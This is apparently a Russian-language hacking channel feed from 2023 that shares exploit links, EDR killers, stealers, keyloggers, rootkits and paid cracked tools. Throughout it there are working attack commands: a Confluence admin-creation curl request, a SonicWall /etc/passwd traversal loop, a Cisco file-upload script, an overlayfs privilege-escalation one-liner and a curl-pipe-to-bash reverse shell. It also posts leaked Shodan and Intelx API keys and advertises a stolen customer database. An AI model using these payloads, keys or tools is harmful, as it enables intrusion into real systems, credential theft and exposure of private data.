macOS RootKit*Умеет фаззить двоичные файлы/драйверы, выполнять чтение/запись ядра, перехватывать функции ядра и пользовательского пространства, устанавливать пользовательские точки останова, заглушку GDB (в разработке), сопоставлять ядра KDK с символами отладки DWARF для выпуска ядер, MachO всех видов, общий доступ к dyld кэши, метаданные Objective C/Swift, библиотеки дампов, внедрение библиотек (например, cycript) и сканирование приложений iOS. |
|
2023-10-14 11:49:33 |
OSCP, OSWE, OSEP, OSED, OSDA, OSWA, que OSWE, OSWP, EXP301, EXP312, WEB300, CEH , CEH v3, CEH v12, CCC , CKLP, Cisco CCNA 200-125 и еще тонна всегоскачать ((((если вы любитель испанского #soclose |
|
2023-10-13 21:03:39 |
Extract the bitlocker recovery keys download2 сценария: linux\windows#bitlocker |
Images
Images
|
2023-10-12 21:22:25 |
АНБ (National Security Agency, NSA) не спит ! И мы не будем.Совсем недавно они выкатывали свежий релиз GHIDRA, Но то ладно, мы со временем Сноудена привыкли. Сегодня выкатили репозиторий ELITEWOLF.В котором плавают различные сигнатуры и аналитика, ориентированные на ICS/SCADA/OT.Занятно, контроллеры там всякие, ребятам из АСУ ТП должно быть интересно.update: а еще интересно что для публикации они используют github, и каждый "отдел" создает свой ОТДЕЛЬНЫЙ репозиторий, прозрачнее не намекнуть ))) #NSA |
Images
|
2023-10-12 18:56:52 |
CVE-2023-27997 FortiGateРазбор - XORtigate: Pre-authentication Remote Code Execution on Fortigate VPNСкачать - exploitДырке 3 месяца - сколько успело проПатчиться расскажет shodan#fortigate #rce |
|
2023-10-12 17:24:36 |
None |
Images
|
2023-10-12 17:24:35 |
None |
|
2023-10-12 17:24:34 |
CVE-2023-42820Дырка в JumpServer (opensource хост-бастион) Usage:python CVE-2023-42820.py -t http://IP:Port -e email -u username |
|
2023-10-12 15:40:55 |
берут на вооружение )))ShellBot Uses Hex IPs to Evade Detection in Attacks on Linux SSH Servers#hideIP #hex #16bit |
|
2023-10-12 12:59:44 |
ДатаСексуалы на месте ? Вся туса в сборе: 0day,rce,dos,eop,xss и дюша метЁлкин Переходите сразу к таблицеТолько вот с CVE-2023-36778 НЕ угадали |
Images
|
2023-10-11 21:12:06 |
Внутри JS ?)) |
Images
|
2023-10-11 20:03:00 |
Cordyceps - род спорыньёвых грибов, пиреномицеты, паразитирующие на определённых видах насекомых. Домен: ЭукариотыЦарство: Грибы*А кроме того это самоинъекционный дроппер на C++, предназначенный для обхода EDR. download#bypass #edr |
Images
|
2023-10-11 18:44:04 |
CVE-2023-22515Confluence Data Center and Server - Broken Access Control VulnerabilityPOC:curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action login - adm1n/adm1nПочитать как это работает |
Images
|
2023-10-11 12:18:31 |
Повышаем привилегии via apt-getвсегда смешно#linux #up |
Images
Images
|
2023-10-11 07:56:31 |
Ох твою мать а, не было печали...)))))))))))))))))Короче, план такойНадеюсь консультанты из Xpanamas ciscoTalos |
|
2023-10-11 07:43:03 |
CVE-2023-36802 windows Local Privilege EscalationUsage:Windows_MSKSSRV_LPE_CVE-2023-6802.exe <pid>где pid — это идентификатор процесса (в десятичном формате), который требуется повысить до SYSTEMPOC#win #lpe |
|
2023-10-11 07:04:24 |
Update:How I made a heap overflow in curl#curl #libcurl #ssrf |
Images
|
2023-10-11 05:47:35 |
VULN in CURLget CVE-2023-38545 - поиграться (сегодня patch)#curl |
Images
|
2023-10-11 05:07:57 |
#бгг |
Images
|
2023-10-07 11:37:24 |
Более 100 Hacking / Infosec pdfread\download |
Images
|
2023-10-07 10:30:57 |
From C, with inline assembly, to shellcoderead#C #shell |
Images
|
2023-10-06 21:00:42 |
Abusing Active Directory Certificate ServicesPart One (5 october 2023)#AD |
Images
|
2023-10-06 18:20:45 |
Следим за трендами* exim RCE* Linux glibc LPE* curl RCE* WS_FTPd* admin/admin |
Images
|
2023-10-05 16:50:38 |
SupernovaReal fucking shellcode encryptor (бгг)download#shellcode #enc |
Images
|
2023-10-05 07:07:22 |
Свежий выпуск Inception 7 |
Images
|
2023-10-02 18:41:28 |
Спасибо всем кто поучаствовал. Отдельное спасибо юристу и правоведу #ran #redteam #malware |
Images
|
2023-10-01 07:06:26 |
CVE-2023-42793Authentication Bypass in JetBrains TeamCity CI/CD |
|
2023-10-01 07:04:56 |
Интересное на почитать*When Exploits Arent Binary *Malware as a service (bunnyLoader)*#exploits #malware #read |
|
2023-09-30 05:43:02 |
Что делать, если вас заставляют работать ?! |
Images
|
2023-09-29 17:40:51 |
OffensiveCon 2023Exploit Engineering – Attacking the Linux Kernel76Слайдов |
Images
|
2023-09-29 05:45:19 |
0-day для CVE-2023-4863 носится по интернету (chrome не при чем, дыра в libwebp image library).И все бы ничего, но libwebp интегрирована во всё (ну почти)Список покрытия |
|
2023-09-28 13:17:55 |
CVE-2023-0126SonicWall SMA1000File Read BugPOC: cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done |
|
2023-09-28 12:23:34 |
CVE-2023-34040Spring-Kafka-Deserialization RCEPOC#apacheKafka |
|
2023-09-28 07:45:13 |
CVE-2023-43770mail server Roundcube*usage:python cve-2023-43770.py -e attacker@gmail.com -p Attack3rPwd -t victim@example.com*POC exploit |
Images
|
2023-09-27 21:54:39 |
😂😂😂😂 |
Images
|
2023-09-27 18:06:52 |
CVE-2023-20209Cisco Expresswayexploit#cisco |
|
2023-09-27 07:22:12 |
CVE-2023-29360Exploit for MSKSSRV.SYS driver POC exploit#lpe #win |
Images
|
2023-09-26 19:31:23 |
CVE-2023-29357Microsoft SharePoint Server (2019) Elevation of Privilege Vulnerability affected from 16.0.0 before 16.0.10399.20005 exploit |
|
2023-09-22 10:24:29 |
PhoneSploit ProТеперь бгг универсальный (что бы это ни значило)download |
Images
|
2023-09-22 10:03:52 |
curlshellreverse shell using curl *usage:*Start your listener:./curlshell.py --certificate fullchain.pem --private-key privkey.pem --listen-port 1234On the remote side:curl https://curlshell:1234 | bashdownload#shell #curl |
|
2023-09-20 20:32:57 |
Elasticsearch Stack Overflow VulnerabilityCVE-2023-31419 Exploit👌 |
Images
|
2023-09-19 20:23:08 |
PDF |
Images
|
2023-09-19 11:24:25 |
fortinet-ssl-vpn-bruteforce |
Images
|
2023-09-19 06:47:57 |
мало кто знает, но на самом деле днищще у ЦРУ 11 сентября |
Images
|
2023-09-19 06:37:47 |
Ну что ? протестировали с lockBit новый бот ?Все еще в дауне)) |
Images
Images
|
2023-09-18 08:12:05 |
🤨 |
Images
|
2023-09-18 08:09:39 |
Burp Suite Plugins developmentread book#BurpSuite |
Images
|
2023-09-13 18:46:16 |
X64Hello |
|
2023-09-12 14:42:56 |
Они и |
|
2023-09-12 14:42:09 |
Гю |
|
2023-08-30 07:44:28 |
VcenterKit - тулкит для эксплоитинга и POSTэксплуатации vmware Vcenter*Сплоитов не так много, пока, но оно легко расширяемое - VcenterKit.py*download#vmware #expl #post #kit |
Images
Images
|
2023-08-29 15:27:08 |
CVE-2023-38388Mass Exploit - CVE-2023-38389 < Wordpress < JupiterX Core < Unauthenticated Account TakeoverDork : inurl: wp-content/plugins/jupiterx-core/POC exploit |
Images
|
2023-08-29 13:39:38 |
#ЦИПсО_Talos |
Images
|
2023-08-29 12:34:12 |
oracle java*POC |
Images
|
2023-08-29 12:19:52 |
CVE-2023-36844 , CVE-2023-36845 , CVE-2023-36846 , CVE-2023-36847*Update watchtowr-vs-junos_juniper_2023-08-25.py |
|
2023-08-29 12:18:08 |
CVE-2023-38831Understanding WinRAR Code Execution |
|
2023-08-26 06:46:15 |
Чортова МоскваСкорее б в Питер)))К расчлененочке))) |
Images
|
2023-08-25 10:45:44 |
ПриходитеДелитесь опытомКонтактами, Можно майками ))))....сами понимаете.... |
Images
|
2023-08-25 10:18:56 |
И внутрь) |
|
2023-08-25 10:18:51 |
None |
Images
|
2023-08-25 10:18:33 |
А как вы думали, эти тусы для этого и существуют, руки пожать, мосты навести, проект замутить, etc. Приходите, даже на вход, поздороваемся, пообщаемся)))) |
|
2023-08-25 10:09:26 |
Норм ребята |
|
2023-08-25 10:09:22 |
None |
Images
|
2023-08-24 13:29:39 |
None |
Images
|
2023-08-24 05:30:33 |
IIS - расшифровка данных без appcmd.exePOC |
Images
|
2023-08-23 19:35:11 |
Мир окон\мир дверей\пластмассовый мир победил - нетМИР шелловshells 2014 - 2023 |
Images
|
2023-08-23 13:37:10 |
Подготовка идёт) |
Images
Images
Images
Images
Images
|
2023-08-23 04:10:10 |
Мы ж хотели тебя через забор перекинуть, давай !!! |
Images
|
2023-08-23 03:54:25 |
Напоминаем, что завтра стартует конференция OffZoneПриходите, будет весело !#offzone #moscow #it #cybersec #2023 |
Images
|
2023-08-22 20:07:49 |
Exploitation of Openfire CVE-2023-32315Full WriteUpOpenfire-Bypass exploit |
Images
|
2023-08-22 09:21:28 |
xss.is вы там это, аккуратнее )https://xss.is/proxy.php?image=https%3A%2F%2Fdownloader.disk.yandex.ru%2Fpreview%2F8884af4bd817bbf0937c044879e6bf34afb2d95c1f14c493b4e39564fbdd2475%2F606426dc%2FmzcuBYol1Yb8wOc9K6NXQ_yNT_4nE1QLJw4LTWRpVOT5DDi0QJok4134hlurUPrtjlev1Ud-HWDKjiPFVQAMJw%253D%253D%3Fuid%3D0%26filename%3D%25D0%2590%25D0%25BD%25D0%25B0%25D0%25BB%25D0%25B8%25D0%25B7%2520%25D0%25B7%25D0%25B0%25D1%2589%25D0%25B8%25D1%2589%25D0%25B5%25D0%25BD%25D0%25BD%25D0%25BE%25D1%2581%25D1%2582%25D0%25B8%2520%25D0%25B1%25D0%25B5%25D1%2581%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B2%25D0%25BE%25D0%25B4%25D0%25BD%25D1%258B%25D1%2585%2520%25D1%2581%25D0%25B5%25D1%2582%25D0%25B5%25D0%25B9.%2520%25D0%25A7%25D0%25B0%25D1%2581%25D1%2582%25D1%258C%25201.mp4%26disposition%3Dinline%26hash%3D%26limit%3D0%26content_type%3Dimage%252Fjpeg%26owner_uid%3D0%26tknv%3Dv2%26crop%3D1%26size%3D200x200&hash=35623f35aff8fe146f0dd9044667024d&return_error=1 |
|
2023-08-21 19:22:09 |
Sonicwall rce CVE-2023-34124*metasploit*use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124ну да ну да 🙃Эксплойт объединяет 4-5 различных уязвимостей. Благодаря @fulmetalpackets |
|
2023-08-21 14:41:04 |
HITCON 2023Демонстрация использования AMDCpuProfiler.sys в AMD. Запуская произвольную запись токена EPROCESS, достигается повышение привилегий до уровня SYSTEM. Отключение флага DSE позволяет загружать вредоносный неподписанный драйвер. В презентации также демонстрируется атака на 360 Total Security путем аннулирования его ObRegisterCallbacks, что позволяет выполнять вредоносные действия в процессах 360 Total Security.*Exploit#AMD |
Images
|
2023-08-21 08:49:27 |
CVE-2023-36874 уязвимость в службе отчетов об ошибках, связанная с повышением привилегий, позволявшая получить права администратора на устройстве Windows.*POC exploit*Read - exploit for 0-day Windows Error Reporting Service bug#windows #lpe |
Images
|
2023-08-20 11:57:01 |
OWASP Top 10 - video*download |
Images
|
2023-08-20 05:02:00 |
Отслеживание интересной малвари для Linux (и UNIX).Трэкнуть#linux #malware |
Images
|
2023-08-19 12:04:36 |
CVE-2023-20073Загрузка произвольного файла без проверки подлинности (XSS) в VPN-маршрутизаторах:Cisco RV340, RV340W, RV345, RV345P Usage:#!/usr/bin/bashTARGET="https://0.0.0.0"; \FILENAME="login.html"; \echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \echo "Access the uploaded file through the following link: $TARGET/$FILENAME"#cisco |
Images
|
2023-08-18 08:59:00 |
dir-300 еще никогда не был так опасен 😀 |
Images
|
2023-08-17 17:16:24 |
Что, если вы запустите сканирование nmap и ВСЕ 65535 портов будут открыты? -A PREROUTING -i eth0 -p tcp -m tcp --dport 23:65535 -j REDIRECT --to-ports 4444 Где 4444 HoneyPot, например.#HA-HA |
Images
|
2023-08-17 16:51:34 |
CVE-2023-3079 google chrome*exploit |
|
2023-08-17 15:51:33 |
Тревожные кадры, а еще там xmprpc естьhttp://dramaalert.com/wp-includes/ |
Images
|
2023-08-17 05:09:53 |
RDP Credential Stealer*download*HowToUse#win #rdp |
Images
|
2023-08-16 13:42:29 |
Я календарь перевернуИ снова RATник в сентябре |
|
2023-08-15 13:56:36 |
Продолжаем публиковать материалы с DefCon 31 SpamChannel Подделка писем с любого домена с помощью MailChannels (+2 миллиона доменов) Упор как всегда на DNS записи SPF и DMARC Пыщь/download |
|
2023-08-15 07:19:41 |
Если нужно быстро сориентироваться по системным вызовам ядра Linux.Числа и параметры для различных архитектур и версий ядра.https://syscalls.mebeim.net#linux #syscalls #arch |
Images
|
2023-08-14 20:36:20 |
WPS Office RCEВерсии: WPS Office 2023 и WPS Office 2019writeUpProofOfConcept |
Images
|
2023-08-14 14:51:00 |
DllNotificationInectionИспользуя концепцию обратных вызовов уведомлений DLL в локальных и удаленных процессах можно вызвать Calc )*WriteUp "must have"*POC |
Images
|
2023-08-14 12:51:34 |
CVE-2023-36664Ghostscript command injection vulnerability PoC exploitexploit#ghostScript #exploit |
Images
|
2023-08-13 09:49:33 |
Продолжаем публиковать материалы с DefCon 31SpamChannelПодделка писем с любого домена с помощью MailChannels (+2 миллиона доменов)Упор как всегда на DNS записи SPF и DMARC Пыщь/download |
|
2023-08-13 07:47:47 |
Утры |
Images
|
2023-08-12 06:16:52 |
Defcon 31 начинает приносить свои первые плодыPOC для обхода EDR в рамках злоупотребления Windows containers frameworkdownload#edr #bypass #defcon |
Images
|
2023-08-11 19:21:50 |
VED-eBPF: Kernel Exploit and Rootkit Detection using eBPF Go#linux #kernel |
Images
|
2023-08-11 11:15:42 |
SHODAN keys успевайтеOefcMxcunkm72Po71vVtX8zUN57vQtACPSKINdQe1GyxGgecYz2191H2JoS9qvgDpHHlgpFt8Ka3Stb5UlTxcaEwciOeF2QM61TvA2dNwxNxmWziZxKzR5aO9tFD00NjxTbXXOSBr0R65OcClImSwzadExoXU4tcEJV3A4Mka2wPs7P8VBCO6xcpRe27iNJumEuInz8UH1ixLGJq4oQhEiJORERVG5xclkY0ng0XMo29zEhzyw3ibQfeEBxghwPFsyeCnFndQ8TE4qAGvhm9nZLBZOBgoLKd7TeyFZ8oyLulHwYUOcSPzZ5w3cLYib61v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kikdTNGRiwYNozXIDRf5DWyGNbkdiS5m3JKkdnzf4fsYWQmGajRDn3hB0RElbUlIaquboYedPn8iDWi6GDSO6h2kz72VLt6bZ3SFQNAMUdkeqXqVOdXsTLYeatFSpZSktdbOygcaGSSq46Lg5fZiADAuFxl4OBbn7zmXAbsu1Ruj5uhTNcxGdbGNgrh9WuMS1B6nkGd8uVE4oryfUVvioprswdKGmA5InzZXYdjHDeJM36AjDfU1feBsyMJIj8XxGzDEBeU0lGqtIO6yCxVFCWC4nUVbvovtjo5 |
|
2023-08-11 04:35:02 |
malware and #exploits http://103.89.15.53/ |
Images
|
2023-08-10 07:36:12 |
АнонсLPE 0daywin 10 - 11win_srv 2012 - 2016 - 2019 - 2022 |
Images
|
2023-08-10 05:47:30 |
Вот Вам мини трик (хейт спич) про OpenVPN.Если у вас linux и прости хоспаде NetworkManager (а в нем еще и плагин для всяких ipsec\vpn\wireguard\etc) и из него не конектит до сервера OpenVPN, но при этом если запускать руками через консоль, то все отлично работает. Тогда в консоли пишем journalctl -u NetworkManagerсреди кучи логов можно grepнуть:AUTH: Received control message: AUTH_FAILED,Data channel cipher negotiation failed (no shared cipher) Вторая ссылка гугла отправит нас в репозиторий openvpn, где белом по черному написано (см скрин), что клиент\сервер добазариться не могут чем шифровать наш траффик на госуслуги (не проплачено) и онлифанс (проплачено).И тут есть 2 пути, либо прописать в обоих конфигах нужный алгоритм шифрования, либо пойти в конфиг клиента и закоментить строку cipher.#vpn #кофе |
Images
Images
Images
|
2023-08-09 15:55:47 |
Обходим AntiMalware Scan interface в Windows 11 в 2023 году*powershell_assembly*#AMSI #win11 #яЕстьХочу |
Images
|
2023-08-09 11:42:52 |
CVE-2023-38182Microsoft Outlook 365 Пропатчено только вчераХостов много#outlook #1day |
Images
|
2023-08-09 07:27:28 |
АААААА 🤮 |
Images
|
2023-08-08 19:06:03 |
CVE-2023-34034Spring WebFlux Write-Up and POC |
Images
|
2023-08-07 11:31:30 |
CVE-2023-3269Linux kernel privilege escalation vulnerabilityexploit |
Images
|
2023-08-07 11:30:31 |
CVE-2023-3269 StackRot Linux kernel privilege escalation vulnerability Ждем ждем)) #linux #lpe |
|
2023-07-31 13:12:31 |
ога блин, счастье , что инета нет или что )))) |
|
2023-07-31 13:11:18 |
звони уже Балин))) |
|
2023-07-31 13:11:09 |
None |
Images
|
2023-07-29 17:18:39 |
CVE-2023-35078 Уязвимость удаленного доступа к API Access vulnerability обнаружена в Ivanti Endpoint Manager Mobile (EPMM)POC exploit |
Images
|
2023-07-29 09:06:30 |
Напоминаю, что в эту субботу будет митап в Санкт-Петербурге. Одевайтесь по погоде и приезжайте на митап, будет интересно! Митап пройдет 29 июля, в 12:00 в Измайловском центре, м. Технологический институт, Измайловский пр., 2 / наб. р. Фонтанки, 120 Мероприятие… |
|
2023-07-28 18:25:01 |
красивое |
Images
|
2023-07-28 17:22:57 |
Знаете, а я приду к Вам завтра ))) |
|
2023-07-28 15:18:39 |
Самый короткий exploit в мире (возможно)unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")' |
Images
|
2023-07-28 11:33:56 |
Etoro.com DataBase.com200000 строк богатых людей |
Images
|
2023-07-28 08:25:17 |
Сисадмины с праздником. Вот вам подарок )CVE-2023-35885 Cloudpanel 1-day ExploitДля версий : v2.0.0 – v2.3.0Пропатчено : 20-06-2023 (v2.3.1)*Exploit + shell#праздникъ #клоунpanel #xploet #shыll |
Images
|
2023-07-27 16:36:35 |
О, прикольно !malware traffic analysis#malware |
Images
|
2023-07-27 15:47:02 |
CVE-2023-29336Дырка в драйвере ядра Win32k и эксплуатируется при открытии специально созданного падонками успешными людьми RTF-файла. LPE до systemАналитика#windows #lpe |
|
2023-07-27 07:04:51 |
WSPCoercePoC для принудительной аутентификации с хостов Windows с использованием MS-WSP.Хост будет подключаться через SMB к хосту листенера, используя учетную запись компьютера.DOWNLOAD#windows #smb |
Images
|
2023-07-26 05:10:10 |
outlook email auth bypassdownload POC and read#outlook |
Images
|
2023-07-26 05:00:00 |
kernel-exploit-factoryLink |
Images
|
2023-07-24 11:51:42 |
Понедельники гавно) |
Images
|
2023-07-21 10:54:06 |
Любят всякие техники\админы\rootiNы\девопсы мультиплексоры типа gnu screen или tmux. Удобно красиво и небезопасно).Задавшись утром вопросом, как заставить его работать на себя (не трогая всякие bashrc и тд), путь был найден. В screen есть директива hardstatus string, которая посредством марсианского языка отрисовывает в терминале информативный статусБар (хостнейм\время\сессии и тд).Так вот, hardstatus string в качестве аргумента может принять и скрипт и линк))), ну а что в скрипте сами понимаете.Пока нашлось 2 способа, красивый марсианский и быдлоБытовой. |
Images
Images
|
2023-07-21 08:42:31 |
BurpSuite PRO version 2023.7JAVA - 18 |
|
2023-07-20 13:35:35 |
Acunetix Premium v14.2.210505179 Full Activated 2023 + BACKDOOR только для постоянных подписчиковЗабавное видео#backdoor #acunetix #резилКоторогоНеБыло |
Images
|
2023-07-20 04:26:21 |
Kevin mitnickF |
|
2023-07-19 17:09:20 |
OpenSSH RCE (forwarded ssh-agent)CVE-2023-38408Интересно#ssh |
Images
|
2023-07-19 13:44:42 |
ColdFusion XSSPOC:{{host}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(document.domain) |
Images
|
2023-07-18 17:27:32 |
От local admin до domain adminAV/EDR - тоже в отстое, потому что дублируется токен реального админа (если конечно запущен такой процесс)hypobrychium#windows #edr #av #admin |
Images
|
2023-07-17 16:32:20 |
#humor_or_not) |
Images
|
2023-07-17 13:33:16 |
CVE-2023-32117Google Drive Plugin, WordPress и отсутствие авторизации via REST API EndpointsPOC CURL ) |
Images
Images
|
2023-07-17 12:33:24 |
GAP#BurpSuite |
Images
|
2023-07-16 14:15:04 |
CVE-2023-20110Cisco Smart Software Manager On-Prem SQL Injection Vulnerability exploit#cisco #sql #exploit |
|
2023-07-16 08:12:03 |
HVNC for Cobalt Strike *Еще одна реализация, хотя сам протокол VNC не задействован (форк TinyNuke)покрытие:Windows Server 2022 x64Windows Server 2016 x64Windows Server 2012 R2 x64Windows Server 2008 x86Windows 7 SP1 x64Download#cobalt #hvnc |
Images
|
2023-07-15 14:09:59 |
Proxy bar в гостях у failover bar ) |
Images
|
2023-07-15 08:34:50 |
CVE-2023-37582 EXPLOITApache RocketMQ *Для теста присутствует RocketMQ environment via Docker*exploit*#apache #exploit #docker |
Images
|
2023-07-14 10:01:08 |
Пятничное#humor |
Images
|
2023-07-13 16:59:10 |
Если openVPN\wireguard не спасает (меня не спасает)то либо ipsec на свой сервер (но это муторно)заверните ВСЁ через ssh (sshuttle)одной командой:sshuttle -r root@TARGETHOST:22 0/0 -x TARGETHOST:22 --dns#ебаныйРКН |
|
2023-07-13 04:45:34 |
CVE-2023-35803 Extreme Networks/Aerohive Wireless Access PointsPOC exploit |
Images
|
2023-07-12 18:51:30 |
О, интересно, только что сгрузили BlackLotus UEFI Windows Bootkit Сорцы\панелька\манЫть#bootkit |
Images
|
2023-07-12 12:58:14 |
SatIntelИзвлечение спутниковой телеметрии, получение орбитальных прогнозов и анализ TLE.Круто !!! Звучит как новое хоббиGet |
Images
|
2023-07-12 09:43:26 |
supermanKill The Protected Processdownload |
|
2023-07-12 07:31:20 |
Кроба книгу написал)))#humor |
Images
|
2023-07-11 11:02:19 |
CVE-2023-24489Citrix ShareFile RCE🔥POC exploit + разбор#citrix |
Images
|
2023-07-11 05:50:50 |
Доброе утро, включаем рабочие машинки ! ) |
Images
|
2023-07-10 20:48:28 |
CVE-2023-31998exploit for Ubiquiti EdgeRouterРазбор уязвимости и POC exploit тут |
Images
|
2023-07-10 07:29:59 |
NimBlackoutЕще один киллер AV/EDRdownload |
|
2023-07-10 07:15:35 |
Оу, какой стиллер))мефедр Phemedrone Stealer Приятный кач, демократические цены)))download#stealer |
Images
|
2023-07-09 17:38:43 |
hvextРасширение Windbg, реализующее команды, полезные для изучения Hyper-V на процессорах Intel.Полезно для ресёрчеров.Да, была использована буква Ёdownload#hyper-v #windgb |
|
2023-07-08 17:46:31 |
Нужна небольшая помощь !есть у кого fucking veeamнужны:Veeam.Backup.Common.dllVeeam.Backup.Interaction.MountService.dllVeeam.Backup.Model.dllа то сплоит не собирается, а качать не хочется.пришлите на почту proxy-bar@proton.me#help |
|
2023-07-08 17:01:11 |
TakeMyRDP 2.0 Обновленная версия кейлогера, предназначенная для процессов, связанных с протоколом удаленного рабочего стола (RDP). Он использует низкоуровневую перехватчик ввода с клавиатуры, что позволяет записывать нажатия клавиш в определенных контекстах (например, в mstsc.exe и CredentialUIBroker.exe).download#rdp |
Images
|
2023-07-08 10:31:10 |
humorsad, but true |
Images
|
2023-07-08 08:33:09 |
Manjaro LPE 0day root LPE for latest Manjaro distro, tested on embedded ARM and x86_64exploit#arch #manjaro #lpe |
Images
|
2023-07-08 07:09:09 |
Рубрика "забавное"http://copy.sh/v86/?profile=windows98#win98 #win2000 |
Images
|
2023-07-07 14:50:13 |
CVE-2023-3269StackRot Linux kernel privilege escalation vulnerabilityЖдем ждем))#linux #lpe |
|
2023-07-07 08:38:05 |
CVE-2023-2868Barracuda ESG Command Injection*Usage:ruby poc_cve_2023_2868.rb <TARGET_IP>*POC exploit |
|
2023-07-07 08:15:04 |
Cisco CCNA 200-301 Exam Complete Course with practical labslink#cisco #ccna |
|
2023-07-01 05:24:14 |
#Рубрика - "смешное"*NoMoreCookiesStealers/RATs Tested:AsyncRATQuasar RATStormKittyFireFox-ThiefDcRatXWorm RAT*Link |
Images
|
2023-07-01 04:46:41 |
С добрый утром ! 🙃 |
|
2023-06-30 18:55:12 |
Ребят, тут Windows Common Log File System протёк Есть патч от апреля, так что не 0-DayCVE-2023-28252POC exploit #windows #lpe |
Images
|
2023-06-30 14:06:05 |
Decrypt FortiManager configuration secrets #fortinet #dec |
Images
|
2023-06-30 07:50:39 |
CVE-2023-2982WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass exploit🔥🔥🔥 |
Images
|
2023-06-29 13:22:32 |
CVE-2023-3338 Linux kernel LPE exploitпока не дорого)#linux #lpe |
Images
|
2023-06-28 20:42:49 |
CVE-2023-26258RCEArcServe UDP BackupclickME |
Images
|
2023-06-27 12:12:58 |
CVE-2023-35844directory traversalexpl |
Images
|
2023-06-27 06:21:22 |
Shellcode Execution via EnumSystemLocalAread |
Images
|
2023-06-27 05:08:16 |
winampcve#humor |
Images
|
2023-06-26 19:48:38 |
DIY Linux Kernel Rootkit DetectionХорошая статья для понимания процессов которые влекут за собой руткиты и как их ловить (или чего еще))))Ловить будет руткит reveng_rtkit с помощью osquery-defense-kit#rootkit #linux |
Images
|
2023-06-26 19:39:54 |
Exploits targeting Symfonyсвят свят свят |
Images
|
2023-06-26 16:43:22 |
CVE-2023-32784 KeePass 2.X Master Password Dumper Буфер обмена подвел )) POC |
Images
|
2023-06-25 07:58:13 |
Когда твоя стирально\отжимательная машина пошла в ransom |
Images
|
2023-06-25 07:54:02 |
Заражение открытых ключей SSH бэкдорами(ну не только, в целом любую херню можно запускать, так как шелл, а сторогой валидации строки нет, в процем ее и нет в MTS банке)))read#ssh |
Images
|
2023-06-25 07:38:33 |
CVE-2023-27372SPIP (before 4.2.1)RCEEXploit#spip #rce |
Images
|
2023-06-17 06:54:20 |
Tor site deanon by EtagА можно просто отключить кэш Etag )))Кипишь#tor #deanon |
Images
|
2023-06-16 15:14:30 |
Intelx Admin API Keyvar API_URL = 'https://2.intelx.io/';var API_KEY = '62fb1e77-0309-4893-80c8-a817c1e76917'; |
|
2023-06-16 14:58:41 |
Продадим ультра софт, да, не новый, но классика )для покупателей proxy-bar@proton.me |
Images
|
2023-06-16 13:27:59 |
CVE-2023-1829LPE exploitTested on Ubuntu22.04 -_ -#linux #exploit |
|
2023-06-16 09:41:30 |
#РукаЛицо📗Вопрос блокировки в РФ мессенджера WhatsApp не обсуждается, предпосылок нет — Шадаев. 🌚Обсуждается, ведется работа - так как через это дырявое вражеское приложение идет документооборот всех силовых структур России и не только силовых!!! - Ситников.😎Хуле вы разнылись, внедряй повелевай VipNet hw-1000 и защищенная почта из рук в руки, голосовые через ТА-57 ))) - Администрация Proxy bar#Пятница |
|
2023-06-15 17:58:33 |
Banshee rootkitWindows x64 Kernel Driver/RootkitЭкспериментальный !!!*download#rootkit #win |
Images
|
2023-06-15 07:23:59 |
Rusty BootkitWindows UEFI Bootkit in Rust (Codename: RedLotus)download#bootkit #win #rust |
Images
|
2023-06-14 20:10:10 |
anonfiles searchby гугле ) |
Images
|
2023-06-13 16:12:00 |
CVE-2023-20887 VMWare vRealize Network Insight Pre-Authenticated RCE exploit#vmware #rce #exploit |
|
2023-06-13 05:26:23 |
Station X - The Complete Cyber Security Course - Volumes 1, 2, 3 & 4 download 11.5 GB |
Images
|
2023-06-13 05:22:10 |
CVE-2023-2008 Бага в драйвере udmabuf ядра Linux (исправлено в версии 5.19-rc4.)impact такое себе, нужен доступ к /dev/udmabuf от kvm юзера*Analyzing and exploitingexploit#linux #exploit |
Images
|
2023-06-12 19:52:18 |
когда логика привела к 6 ошибкам )#humor |
Images
|
2023-06-12 12:54:29 |
CVE-2023-34362 MOVEitexploit + crt + pem + pubUsage:python CVE-2023-34362.py https://127.0.0.1[*] Getting sysadmin access token[*] Got access token[*] Getting FolderID[*] Got FolderID: 963611079[*] Starting file upload[*] Got FileID: 965943963[*] Injecting the payload[*] Payload injected[*] Triggering payload via resume call[+] Triggered the payload![*] Deleting uploaded file |
|
2023-06-12 12:45:17 |
MySQL Fake Serverdownload+docker |
Images
|
2023-06-12 07:50:14 |
Не обновляйтесь до новой версии Debian 12critical bugsОхереть релиз))#debian #LoL 🧐 |
Images
|
2023-06-12 06:26:20 |
CVE-2023-25157GeoServer SQL Injection - POC exploitGeoServer SQL Injection - check vuln script |
Images
|
2023-06-12 06:03:31 |
SharpTerminatorПоубивать процессы AV/EDR с помощью драйвера ядра download#edr |
Images
|
2023-06-08 08:01:22 |
libssh CVE-2023-2283POC exploitusage:~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub#ssh |
Images
|
2023-06-08 07:46:09 |
DropSpawnCobaltStrike BOF для создания маяков с использованием DLL Application Directory Hijackingdownload |
Images
|
2023-06-08 07:41:08 |
SignatureGateБоевая версия HellsGate, обходящая AV/EDR/EPP путем злоупотребления опциональным исправлением CVE-2013-3900download#bypass #edr |
Images
|
2023-06-03 14:25:01 |
Создаем и обфусцируем DLL которая отключит AMSI и ETWreadMEdownload LightsOut |
Images
|
2023-06-03 08:27:25 |
Прикольно, но зачем последний октет икситьbrute.fail#bruteforce |
|
2023-06-02 14:30:06 |
